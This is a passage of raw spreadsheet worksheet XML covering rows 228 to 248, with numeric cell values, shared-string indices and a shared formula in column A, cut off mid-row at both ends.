      <c r="O228" s="4" t="s">
        <v>770</v>
      </c>
      <c r="P228" s="4" t="s">
        <v>771</v>
      </c>
      <c r="Q228" s="6">
        <v>2917078.0</v>
      </c>
      <c r="R228" s="8"/>
      <c r="S228" s="8"/>
      <c r="T228" s="8"/>
      <c r="U228" s="8"/>
      <c r="V228" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W228" s="2" t="s">
        <v>772</v>
      </c>
      <c r="X228" s="6">
        <v>0.0</v>
      </c>
      <c r="Y228" s="6">
        <v>3.0</v>
      </c>
      <c r="Z228" s="8"/>
      <c r="AA228" s="8"/>
      <c r="AB228" s="8"/>
      <c r="AC228" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE228" s="8"/>
      <c r="AF228" s="14"/>
    </row>
    <row r="229">
      <c r="A229" s="6">
        <f t="shared" si="1"/>
        <v>0.6118898761</v>
      </c>
      <c r="B229" s="6">
        <v>6.0308262E7</v>
      </c>
      <c r="C229" s="6">
        <v>1.0</v>
      </c>
      <c r="D229" s="6">
        <v>6.0318428E7</v>
      </c>
      <c r="E229" s="8"/>
      <c r="F229" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G229" s="8"/>
      <c r="H229" s="6">
        <v>1.0</v>
      </c>
      <c r="I229" s="6">
        <v>1006.0</v>
      </c>
      <c r="J229" s="17"/>
      <c r="K229" s="17"/>
      <c r="L229" s="17"/>
      <c r="M229" s="17"/>
      <c r="N229" s="17"/>
      <c r="O229" s="4" t="s">
        <v>773</v>
      </c>
      <c r="P229" s="4" t="s">
        <v>774</v>
      </c>
      <c r="Q229" s="6">
        <v>1.2925018E7</v>
      </c>
      <c r="R229" s="7"/>
      <c r="S229" s="6">
        <v>1.2925018E7</v>
      </c>
      <c r="T229" s="7"/>
      <c r="U229" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V229" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W229" s="2" t="s">
        <v>775</v>
      </c>
      <c r="X229" s="6">
        <v>2.0</v>
      </c>
      <c r="Y229" s="6">
        <v>6.0</v>
      </c>
      <c r="Z229" s="7"/>
      <c r="AA229" s="7"/>
      <c r="AB229" s="7"/>
      <c r="AC229" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE229" s="8"/>
      <c r="AF229" s="15"/>
    </row>
    <row r="230">
      <c r="A230" s="6">
        <f t="shared" si="1"/>
        <v>0.04022557564</v>
      </c>
      <c r="B230" s="6">
        <v>6.1867168E7</v>
      </c>
      <c r="C230" s="6">
        <v>1.0</v>
      </c>
      <c r="D230" s="7"/>
      <c r="E230" s="8"/>
      <c r="F230" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G230" s="8"/>
      <c r="H230" s="6">
        <v>3.0</v>
      </c>
      <c r="I230" s="6">
        <v>1311.0</v>
      </c>
      <c r="J230" s="17"/>
      <c r="K230" s="17"/>
      <c r="L230" s="17"/>
      <c r="M230" s="17"/>
      <c r="N230" s="17"/>
      <c r="O230" s="4" t="s">
        <v>776</v>
      </c>
      <c r="P230" s="4" t="s">
        <v>777</v>
      </c>
      <c r="Q230" s="6">
        <v>2924784.0</v>
      </c>
      <c r="R230" s="7"/>
      <c r="S230" s="6">
        <v>2924784.0</v>
      </c>
      <c r="T230" s="7"/>
      <c r="U230" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V230" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W230" s="2" t="s">
        <v>778</v>
      </c>
      <c r="X230" s="6">
        <v>1.0</v>
      </c>
      <c r="Y230" s="6">
        <v>2.0</v>
      </c>
      <c r="Z230" s="7"/>
      <c r="AA230" s="7"/>
      <c r="AB230" s="7"/>
      <c r="AC230" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE230" s="8"/>
      <c r="AF230" s="15"/>
    </row>
    <row r="231">
      <c r="A231" s="6">
        <f t="shared" si="1"/>
        <v>0.06546353523</v>
      </c>
      <c r="B231" s="6">
        <v>1.0130576E7</v>
      </c>
      <c r="C231" s="6">
        <v>1.0</v>
      </c>
      <c r="D231" s="8"/>
      <c r="E231" s="8"/>
      <c r="F231" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G231" s="8"/>
      <c r="H231" s="6">
        <v>0.0</v>
      </c>
      <c r="I231" s="6">
        <v>364.0</v>
      </c>
      <c r="J231" s="20"/>
      <c r="K231" s="20"/>
      <c r="L231" s="20"/>
      <c r="M231" s="20"/>
      <c r="N231" s="20"/>
      <c r="O231" s="4" t="s">
        <v>779</v>
      </c>
      <c r="P231" s="4" t="s">
        <v>780</v>
      </c>
      <c r="Q231" s="6">
        <v>1330007.0</v>
      </c>
      <c r="R231" s="8"/>
      <c r="S231" s="8"/>
      <c r="T231" s="8"/>
      <c r="U231" s="8"/>
      <c r="V231" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W231" s="2" t="s">
        <v>781</v>
      </c>
      <c r="X231" s="6">
        <v>1.0</v>
      </c>
      <c r="Y231" s="6">
        <v>0.0</v>
      </c>
      <c r="Z231" s="8"/>
      <c r="AA231" s="8"/>
      <c r="AB231" s="8"/>
      <c r="AC231" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE231" s="8"/>
      <c r="AF231" s="14"/>
    </row>
    <row r="232">
      <c r="A232" s="6">
        <f t="shared" si="1"/>
        <v>0.006756078746</v>
      </c>
      <c r="B232" s="6">
        <v>4.4559895E7</v>
      </c>
      <c r="C232" s="6">
        <v>1.0</v>
      </c>
      <c r="D232" s="8"/>
      <c r="E232" s="8"/>
      <c r="F232" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G232" s="8"/>
      <c r="H232" s="6">
        <v>0.0</v>
      </c>
      <c r="I232" s="6">
        <v>122.0</v>
      </c>
      <c r="J232" s="20"/>
      <c r="K232" s="20"/>
      <c r="L232" s="20"/>
      <c r="M232" s="20"/>
      <c r="N232" s="20"/>
      <c r="O232" s="4" t="s">
        <v>782</v>
      </c>
      <c r="P232" s="4" t="s">
        <v>783</v>
      </c>
      <c r="Q232" s="6">
        <v>944573.0</v>
      </c>
      <c r="R232" s="8"/>
      <c r="S232" s="8"/>
      <c r="T232" s="8"/>
      <c r="U232" s="8"/>
      <c r="V232" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W232" s="2" t="s">
        <v>784</v>
      </c>
      <c r="X232" s="6">
        <v>0.0</v>
      </c>
      <c r="Y232" s="6">
        <v>2.0</v>
      </c>
      <c r="Z232" s="8"/>
      <c r="AA232" s="8"/>
      <c r="AB232" s="8"/>
      <c r="AC232" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE232" s="8"/>
      <c r="AF232" s="14"/>
    </row>
    <row r="233">
      <c r="A233" s="6">
        <f t="shared" si="1"/>
        <v>0.601146935</v>
      </c>
      <c r="B233" s="6">
        <v>1.7911854E7</v>
      </c>
      <c r="C233" s="6">
        <v>1.0</v>
      </c>
      <c r="D233" s="7"/>
      <c r="E233" s="8"/>
      <c r="F233" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G233" s="8"/>
      <c r="H233" s="6">
        <v>7.0</v>
      </c>
      <c r="I233" s="6">
        <v>3577.0</v>
      </c>
      <c r="J233" s="17"/>
      <c r="K233" s="17"/>
      <c r="L233" s="17"/>
      <c r="M233" s="17"/>
      <c r="N233" s="17"/>
      <c r="O233" s="4" t="s">
        <v>785</v>
      </c>
      <c r="P233" s="4" t="s">
        <v>786</v>
      </c>
      <c r="Q233" s="6">
        <v>373985.0</v>
      </c>
      <c r="R233" s="7"/>
      <c r="S233" s="6">
        <v>-1.0</v>
      </c>
      <c r="T233" s="7"/>
      <c r="U233" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V233" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W233" s="2" t="s">
        <v>787</v>
      </c>
      <c r="X233" s="6">
        <v>3.0</v>
      </c>
      <c r="Y233" s="6">
        <v>5.0</v>
      </c>
      <c r="Z233" s="6">
        <v>0.0</v>
      </c>
      <c r="AA233" s="7"/>
      <c r="AB233" s="7"/>
      <c r="AC233" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE233" s="8"/>
      <c r="AF233" s="15"/>
    </row>
    <row r="234">
      <c r="A234" s="6">
        <f t="shared" si="1"/>
        <v>0.6696648264</v>
      </c>
      <c r="B234" s="6">
        <v>2.9053908E7</v>
      </c>
      <c r="C234" s="6">
        <v>1.0</v>
      </c>
      <c r="D234" s="8"/>
      <c r="E234" s="8"/>
      <c r="F234" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G234" s="8"/>
      <c r="H234" s="6">
        <v>1.0</v>
      </c>
      <c r="I234" s="6">
        <v>237.0</v>
      </c>
      <c r="J234" s="20"/>
      <c r="K234" s="20"/>
      <c r="L234" s="20"/>
      <c r="M234" s="20"/>
      <c r="N234" s="20"/>
      <c r="O234" s="4" t="s">
        <v>788</v>
      </c>
      <c r="P234" s="4" t="s">
        <v>789</v>
      </c>
      <c r="Q234" s="6">
        <v>311343.0</v>
      </c>
      <c r="R234" s="8"/>
      <c r="S234" s="8"/>
      <c r="T234" s="8"/>
      <c r="U234" s="8"/>
      <c r="V234" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W234" s="2" t="s">
        <v>790</v>
      </c>
      <c r="X234" s="6">
        <v>1.0</v>
      </c>
      <c r="Y234" s="6">
        <v>2.0</v>
      </c>
      <c r="Z234" s="8"/>
      <c r="AA234" s="8"/>
      <c r="AB234" s="8"/>
      <c r="AC234" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE234" s="8"/>
      <c r="AF234" s="14"/>
    </row>
    <row r="235">
      <c r="A235" s="6">
        <f t="shared" si="1"/>
        <v>0.925637177</v>
      </c>
      <c r="B235" s="6">
        <v>1.6526123E7</v>
      </c>
      <c r="C235" s="6">
        <v>1.0</v>
      </c>
      <c r="D235" s="8"/>
      <c r="E235" s="8"/>
      <c r="F235" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G235" s="8"/>
      <c r="H235" s="6">
        <v>0.0</v>
      </c>
      <c r="I235" s="6">
        <v>444.0</v>
      </c>
      <c r="J235" s="20"/>
      <c r="K235" s="20"/>
      <c r="L235" s="20"/>
      <c r="M235" s="20"/>
      <c r="N235" s="20"/>
      <c r="O235" s="4" t="s">
        <v>791</v>
      </c>
      <c r="P235" s="4" t="s">
        <v>792</v>
      </c>
      <c r="Q235" s="6">
        <v>2378392.0</v>
      </c>
      <c r="R235" s="8"/>
      <c r="S235" s="8"/>
      <c r="T235" s="8"/>
      <c r="U235" s="8"/>
      <c r="V235" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W235" s="2" t="s">
        <v>793</v>
      </c>
      <c r="X235" s="6">
        <v>2.0</v>
      </c>
      <c r="Y235" s="6">
        <v>0.0</v>
      </c>
      <c r="Z235" s="8"/>
      <c r="AA235" s="8"/>
      <c r="AB235" s="8"/>
      <c r="AC235" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE235" s="8"/>
      <c r="AF235" s="14"/>
    </row>
    <row r="236">
      <c r="A236" s="6">
        <f t="shared" si="1"/>
        <v>0.7073712828</v>
      </c>
      <c r="B236" s="6">
        <v>3.6233274E7</v>
      </c>
      <c r="C236" s="6">
        <v>1.0</v>
      </c>
      <c r="D236" s="8"/>
      <c r="E236" s="8"/>
      <c r="F236" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G236" s="8"/>
      <c r="H236" s="6">
        <v>-2.0</v>
      </c>
      <c r="I236" s="6">
        <v>224.0</v>
      </c>
      <c r="J236" s="20"/>
      <c r="K236" s="20"/>
      <c r="L236" s="20"/>
      <c r="M236" s="20"/>
      <c r="N236" s="20"/>
      <c r="O236" s="4" t="s">
        <v>794</v>
      </c>
      <c r="P236" s="4" t="s">
        <v>795</v>
      </c>
      <c r="Q236" s="6">
        <v>1085120.0</v>
      </c>
      <c r="R236" s="8"/>
      <c r="S236" s="6">
        <v>2626000.0</v>
      </c>
      <c r="T236" s="8"/>
      <c r="U236" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V236" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W236" s="2" t="s">
        <v>215</v>
      </c>
      <c r="X236" s="6">
        <v>1.0</v>
      </c>
      <c r="Y236" s="6">
        <v>1.0</v>
      </c>
      <c r="Z236" s="8"/>
      <c r="AA236" s="8"/>
      <c r="AB236" s="8"/>
      <c r="AC236" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE236" s="8"/>
      <c r="AF236" s="14"/>
    </row>
    <row r="237">
      <c r="A237" s="6">
        <f t="shared" si="1"/>
        <v>0.2099755598</v>
      </c>
      <c r="B237" s="6">
        <v>3.8886393E7</v>
      </c>
      <c r="C237" s="6">
        <v>1.0</v>
      </c>
      <c r="D237" s="6">
        <v>3.8886462E7</v>
      </c>
      <c r="E237" s="8"/>
      <c r="F237" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G237" s="8"/>
      <c r="H237" s="6">
        <v>2.0</v>
      </c>
      <c r="I237" s="6">
        <v>3182.0</v>
      </c>
      <c r="J237" s="17"/>
      <c r="K237" s="17"/>
      <c r="L237" s="17"/>
      <c r="M237" s="17"/>
      <c r="N237" s="17"/>
      <c r="O237" s="4" t="s">
        <v>796</v>
      </c>
      <c r="P237" s="4" t="s">
        <v>797</v>
      </c>
      <c r="Q237" s="6">
        <v>426.0</v>
      </c>
      <c r="R237" s="7"/>
      <c r="S237" s="7"/>
      <c r="T237" s="7"/>
      <c r="U237" s="8"/>
      <c r="V237" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W237" s="2" t="s">
        <v>798</v>
      </c>
      <c r="X237" s="6">
        <v>1.0</v>
      </c>
      <c r="Y237" s="6">
        <v>0.0</v>
      </c>
      <c r="Z237" s="7"/>
      <c r="AA237" s="7"/>
      <c r="AB237" s="7"/>
      <c r="AC237" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE237" s="8"/>
      <c r="AF237" s="15"/>
    </row>
    <row r="238">
      <c r="A238" s="6">
        <f t="shared" si="1"/>
        <v>0.9819649157</v>
      </c>
      <c r="B238" s="6">
        <v>2.7063819E7</v>
      </c>
      <c r="C238" s="6">
        <v>1.0</v>
      </c>
      <c r="D238" s="6">
        <v>2.7111679E7</v>
      </c>
      <c r="E238" s="8"/>
      <c r="F238" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G238" s="8"/>
      <c r="H238" s="6">
        <v>5.0</v>
      </c>
      <c r="I238" s="6">
        <v>38875.0</v>
      </c>
      <c r="J238" s="20"/>
      <c r="K238" s="20"/>
      <c r="L238" s="20"/>
      <c r="M238" s="20"/>
      <c r="N238" s="20"/>
      <c r="O238" s="4" t="s">
        <v>799</v>
      </c>
      <c r="P238" s="4" t="s">
        <v>800</v>
      </c>
      <c r="Q238" s="6">
        <v>535967.0</v>
      </c>
      <c r="R238" s="8"/>
      <c r="S238" s="6">
        <v>535967.0</v>
      </c>
      <c r="T238" s="8"/>
      <c r="U238" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V238" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W238" s="2" t="s">
        <v>801</v>
      </c>
      <c r="X238" s="6">
        <v>3.0</v>
      </c>
      <c r="Y238" s="6">
        <v>0.0</v>
      </c>
      <c r="Z238" s="6">
        <v>0.0</v>
      </c>
      <c r="AA238" s="8"/>
      <c r="AB238" s="8"/>
      <c r="AC238" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE238" s="8"/>
      <c r="AF238" s="14"/>
    </row>
    <row r="239">
      <c r="A239" s="6">
        <f t="shared" si="1"/>
        <v>0.7172993856</v>
      </c>
      <c r="B239" s="6">
        <v>5.7445907E7</v>
      </c>
      <c r="C239" s="6">
        <v>1.0</v>
      </c>
      <c r="D239" s="6">
        <v>5.7445939E7</v>
      </c>
      <c r="E239" s="8"/>
      <c r="F239" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G239" s="8"/>
      <c r="H239" s="6">
        <v>-2.0</v>
      </c>
      <c r="I239" s="6">
        <v>1517.0</v>
      </c>
      <c r="J239" s="20"/>
      <c r="K239" s="20"/>
      <c r="L239" s="20"/>
      <c r="M239" s="20"/>
      <c r="N239" s="20"/>
      <c r="O239" s="4" t="s">
        <v>802</v>
      </c>
      <c r="P239" s="4" t="s">
        <v>803</v>
      </c>
      <c r="Q239" s="6">
        <v>1.0675882E7</v>
      </c>
      <c r="R239" s="8"/>
      <c r="S239" s="6">
        <v>6553328.0</v>
      </c>
      <c r="T239" s="8"/>
      <c r="U239" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V239" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W239" s="2" t="s">
        <v>804</v>
      </c>
      <c r="X239" s="6">
        <v>3.0</v>
      </c>
      <c r="Y239" s="6">
        <v>4.0</v>
      </c>
      <c r="Z239" s="8"/>
      <c r="AA239" s="8"/>
      <c r="AB239" s="8"/>
      <c r="AC239" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE239" s="8"/>
      <c r="AF239" s="14"/>
    </row>
    <row r="240">
      <c r="A240" s="6">
        <f t="shared" si="1"/>
        <v>0.9568710499</v>
      </c>
      <c r="B240" s="6">
        <v>5.7671927E7</v>
      </c>
      <c r="C240" s="6">
        <v>1.0</v>
      </c>
      <c r="D240" s="6">
        <v>5.7672332E7</v>
      </c>
      <c r="E240" s="8"/>
      <c r="F240" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G240" s="8"/>
      <c r="H240" s="6">
        <v>1.0</v>
      </c>
      <c r="I240" s="6">
        <v>629.0</v>
      </c>
      <c r="J240" s="17"/>
      <c r="K240" s="17"/>
      <c r="L240" s="17"/>
      <c r="M240" s="17"/>
      <c r="N240" s="17"/>
      <c r="O240" s="4" t="s">
        <v>805</v>
      </c>
      <c r="P240" s="4" t="s">
        <v>806</v>
      </c>
      <c r="Q240" s="6">
        <v>8771281.0</v>
      </c>
      <c r="R240" s="7"/>
      <c r="S240" s="6">
        <v>8771281.0</v>
      </c>
      <c r="T240" s="7"/>
      <c r="U240" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V240" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W240" s="2" t="s">
        <v>807</v>
      </c>
      <c r="X240" s="6">
        <v>1.0</v>
      </c>
      <c r="Y240" s="6">
        <v>0.0</v>
      </c>
      <c r="Z240" s="7"/>
      <c r="AA240" s="7"/>
      <c r="AB240" s="7"/>
      <c r="AC240" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE240" s="8"/>
      <c r="AF240" s="15"/>
    </row>
    <row r="241">
      <c r="A241" s="6">
        <f t="shared" si="1"/>
        <v>0.07614186269</v>
      </c>
      <c r="B241" s="6">
        <v>7.106231E7</v>
      </c>
      <c r="C241" s="6">
        <v>1.0</v>
      </c>
      <c r="D241" s="7"/>
      <c r="E241" s="8"/>
      <c r="F241" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G241" s="8"/>
      <c r="H241" s="6">
        <v>-2.0</v>
      </c>
      <c r="I241" s="6">
        <v>181.0</v>
      </c>
      <c r="J241" s="17"/>
      <c r="K241" s="17"/>
      <c r="L241" s="17"/>
      <c r="M241" s="17"/>
      <c r="N241" s="17"/>
      <c r="O241" s="4" t="s">
        <v>808</v>
      </c>
      <c r="P241" s="4" t="s">
        <v>809</v>
      </c>
      <c r="Q241" s="6">
        <v>1.6455668E7</v>
      </c>
      <c r="R241" s="7"/>
      <c r="S241" s="7"/>
      <c r="T241" s="7"/>
      <c r="U241" s="8"/>
      <c r="V241" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W241" s="2" t="s">
        <v>810</v>
      </c>
      <c r="X241" s="6">
        <v>2.0</v>
      </c>
      <c r="Y241" s="6">
        <v>5.0</v>
      </c>
      <c r="Z241" s="7"/>
      <c r="AA241" s="7"/>
      <c r="AB241" s="7"/>
      <c r="AC241" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE241" s="8"/>
      <c r="AF241" s="15"/>
    </row>
    <row r="242">
      <c r="A242" s="6">
        <f t="shared" si="1"/>
        <v>0.3436895835</v>
      </c>
      <c r="B242" s="6">
        <v>1.2439499E7</v>
      </c>
      <c r="C242" s="6">
        <v>1.0</v>
      </c>
      <c r="D242" s="6">
        <v>2.5682607E7</v>
      </c>
      <c r="E242" s="8"/>
      <c r="F242" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G242" s="8"/>
      <c r="H242" s="6">
        <v>12.0</v>
      </c>
      <c r="I242" s="6">
        <v>697.0</v>
      </c>
      <c r="J242" s="20"/>
      <c r="K242" s="20"/>
      <c r="L242" s="20"/>
      <c r="M242" s="20"/>
      <c r="N242" s="20"/>
      <c r="O242" s="4" t="s">
        <v>811</v>
      </c>
      <c r="P242" s="4" t="s">
        <v>812</v>
      </c>
      <c r="Q242" s="6">
        <v>575699.0</v>
      </c>
      <c r="R242" s="8"/>
      <c r="S242" s="8"/>
      <c r="T242" s="8"/>
      <c r="U242" s="8"/>
      <c r="V242" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W242" s="2" t="s">
        <v>813</v>
      </c>
      <c r="X242" s="6">
        <v>3.0</v>
      </c>
      <c r="Y242" s="6">
        <v>1.0</v>
      </c>
      <c r="Z242" s="6">
        <v>0.0</v>
      </c>
      <c r="AA242" s="8"/>
      <c r="AB242" s="8"/>
      <c r="AC242" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE242" s="8"/>
      <c r="AF242" s="14"/>
    </row>
    <row r="243">
      <c r="A243" s="6">
        <f t="shared" si="1"/>
        <v>0.8921493466</v>
      </c>
      <c r="B243" s="6">
        <v>7.5606725E7</v>
      </c>
      <c r="C243" s="6">
        <v>1.0</v>
      </c>
      <c r="D243" s="8"/>
      <c r="E243" s="8"/>
      <c r="F243" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G243" s="8"/>
      <c r="H243" s="6">
        <v>0.0</v>
      </c>
      <c r="I243" s="6">
        <v>22.0</v>
      </c>
      <c r="J243" s="20"/>
      <c r="K243" s="20"/>
      <c r="L243" s="20"/>
      <c r="M243" s="20"/>
      <c r="N243" s="20"/>
      <c r="O243" s="4" t="s">
        <v>814</v>
      </c>
      <c r="P243" s="4" t="s">
        <v>815</v>
      </c>
      <c r="Q243" s="6">
        <v>27876.0</v>
      </c>
      <c r="R243" s="8"/>
      <c r="S243" s="8"/>
      <c r="T243" s="8"/>
      <c r="U243" s="8"/>
      <c r="V243" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W243" s="2" t="s">
        <v>816</v>
      </c>
      <c r="X243" s="6">
        <v>2.0</v>
      </c>
      <c r="Y243" s="6">
        <v>0.0</v>
      </c>
      <c r="Z243" s="8"/>
      <c r="AA243" s="8"/>
      <c r="AB243" s="8"/>
      <c r="AC243" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE243" s="8"/>
      <c r="AF243" s="14"/>
    </row>
    <row r="244">
      <c r="A244" s="6">
        <f t="shared" si="1"/>
        <v>0.9752229475</v>
      </c>
      <c r="B244" s="6">
        <v>3.3242925E7</v>
      </c>
      <c r="C244" s="6">
        <v>1.0</v>
      </c>
      <c r="D244" s="7"/>
      <c r="E244" s="8"/>
      <c r="F244" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G244" s="8"/>
      <c r="H244" s="6">
        <v>1.0</v>
      </c>
      <c r="I244" s="6">
        <v>36.0</v>
      </c>
      <c r="J244" s="17"/>
      <c r="K244" s="17"/>
      <c r="L244" s="17"/>
      <c r="M244" s="17"/>
      <c r="N244" s="17"/>
      <c r="O244" s="4" t="s">
        <v>817</v>
      </c>
      <c r="P244" s="4" t="s">
        <v>818</v>
      </c>
      <c r="Q244" s="6">
        <v>5468260.0</v>
      </c>
      <c r="R244" s="7"/>
      <c r="S244" s="7"/>
      <c r="T244" s="7"/>
      <c r="U244" s="8"/>
      <c r="V244" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W244" s="2" t="s">
        <v>819</v>
      </c>
      <c r="X244" s="6">
        <v>1.0</v>
      </c>
      <c r="Y244" s="6">
        <v>0.0</v>
      </c>
      <c r="Z244" s="7"/>
      <c r="AA244" s="7"/>
      <c r="AB244" s="7"/>
      <c r="AC244" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE244" s="8"/>
      <c r="AF244" s="15"/>
    </row>
    <row r="245">
      <c r="A245" s="6">
        <f t="shared" si="1"/>
        <v>0.2489079107</v>
      </c>
      <c r="B245" s="6">
        <v>7205937.0</v>
      </c>
      <c r="C245" s="6">
        <v>1.0</v>
      </c>
      <c r="D245" s="6">
        <v>7207641.0</v>
      </c>
      <c r="E245" s="8"/>
      <c r="F245" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G245" s="8"/>
      <c r="H245" s="6">
        <v>21.0</v>
      </c>
      <c r="I245" s="6">
        <v>1997.0</v>
      </c>
      <c r="J245" s="20"/>
      <c r="K245" s="20"/>
      <c r="L245" s="20"/>
      <c r="M245" s="20"/>
      <c r="N245" s="20"/>
      <c r="O245" s="4" t="s">
        <v>820</v>
      </c>
      <c r="P245" s="4" t="s">
        <v>821</v>
      </c>
      <c r="Q245" s="6">
        <v>345813.0</v>
      </c>
      <c r="R245" s="8"/>
      <c r="S245" s="6">
        <v>15416.0</v>
      </c>
      <c r="T245" s="8"/>
      <c r="U245" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V245" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W245" s="2" t="s">
        <v>822</v>
      </c>
      <c r="X245" s="6">
        <v>3.0</v>
      </c>
      <c r="Y245" s="6">
        <v>2.0</v>
      </c>
      <c r="Z245" s="6">
        <v>0.0</v>
      </c>
      <c r="AA245" s="8"/>
      <c r="AB245" s="8"/>
      <c r="AC245" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE245" s="8"/>
      <c r="AF245" s="14"/>
    </row>
    <row r="246">
      <c r="A246" s="6">
        <f t="shared" si="1"/>
        <v>0.9984556411</v>
      </c>
      <c r="B246" s="6">
        <v>6.9162405E7</v>
      </c>
      <c r="C246" s="6">
        <v>1.0</v>
      </c>
      <c r="D246" s="8"/>
      <c r="E246" s="8"/>
      <c r="F246" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G246" s="8"/>
      <c r="H246" s="6">
        <v>0.0</v>
      </c>
      <c r="I246" s="6">
        <v>1330.0</v>
      </c>
      <c r="J246" s="17"/>
      <c r="K246" s="17"/>
      <c r="L246" s="17"/>
      <c r="M246" s="17"/>
      <c r="N246" s="17"/>
      <c r="O246" s="4" t="s">
        <v>823</v>
      </c>
      <c r="P246" s="4" t="s">
        <v>824</v>
      </c>
      <c r="Q246" s="6">
        <v>1.6899229E7</v>
      </c>
      <c r="R246" s="7"/>
      <c r="S246" s="6">
        <v>1.6899229E7</v>
      </c>
      <c r="T246" s="7"/>
      <c r="U246" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V246" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W246" s="2" t="s">
        <v>825</v>
      </c>
      <c r="X246" s="6">
        <v>0.0</v>
      </c>
      <c r="Y246" s="6">
        <v>1.0</v>
      </c>
      <c r="Z246" s="6">
        <v>0.0</v>
      </c>
      <c r="AA246" s="7"/>
      <c r="AB246" s="7"/>
      <c r="AC246" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE246" s="8"/>
      <c r="AF246" s="15"/>
    </row>
    <row r="247">
      <c r="A247" s="6">
        <f t="shared" si="1"/>
        <v>0.4727630666</v>
      </c>
      <c r="B247" s="6">
        <v>6.0172909E7</v>
      </c>
      <c r="C247" s="6">
        <v>1.0</v>
      </c>
      <c r="D247" s="7"/>
      <c r="E247" s="8"/>
      <c r="F247" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G247" s="8"/>
      <c r="H247" s="6">
        <v>4.0</v>
      </c>
      <c r="I247" s="6">
        <v>1727.0</v>
      </c>
      <c r="J247" s="17"/>
      <c r="K247" s="17"/>
      <c r="L247" s="17"/>
      <c r="M247" s="17"/>
      <c r="N247" s="17"/>
      <c r="O247" s="4" t="s">
        <v>826</v>
      </c>
      <c r="P247" s="4" t="s">
        <v>827</v>
      </c>
      <c r="Q247" s="6">
        <v>3190347.0</v>
      </c>
      <c r="R247" s="7"/>
      <c r="S247" s="6">
        <v>3190347.0</v>
      </c>
      <c r="T247" s="7"/>
      <c r="U247" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V247" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W247" s="2" t="s">
        <v>828</v>
      </c>
      <c r="X247" s="6">
        <v>1.0</v>
      </c>
      <c r="Y247" s="6">
        <v>0.0</v>
      </c>
      <c r="Z247" s="7"/>
      <c r="AA247" s="7"/>
      <c r="AB247" s="7"/>
      <c r="AC247" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE247" s="8"/>
      <c r="AF247" s="15"/>
    </row>
    <row r="248">
      <c r="A248" s="6">
        <f t="shared" si="1"/>
        <v>0.9530521643</v>
      </c>
      <c r="B248" s="6">
        <v>1.9393163E7</v>
      </c>
      <c r="C248" s="6">
        <v>1.0</v>
      </c>
      <c r="D248" s="7"/>
      <c r="E248" s="8"/>
      <c r="F248" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G248" s="8"/>
      <c r="H248" s="6">
        <v>6.0</v>
      </c>
      <c r="I248" s="6">
        <v>6129.0</v>
      </c>
      <c r="J248" s="17"/>
      <c r="K248" s="17"/>
      <c r="L248" s="17"/>
      <c r="M248" s="17"/>
      <c r="N248" s="17"/>
      <c r="O248" s="4" t="s">
        <v>829</v>
      </c>
      <c r="P248" s="4" t="s">
        <v>830</v>
      </c>
      <c r="Q248" s="6">
        <v>2884462.0</v>
      </c>
      <c r="R248" s="7"/>
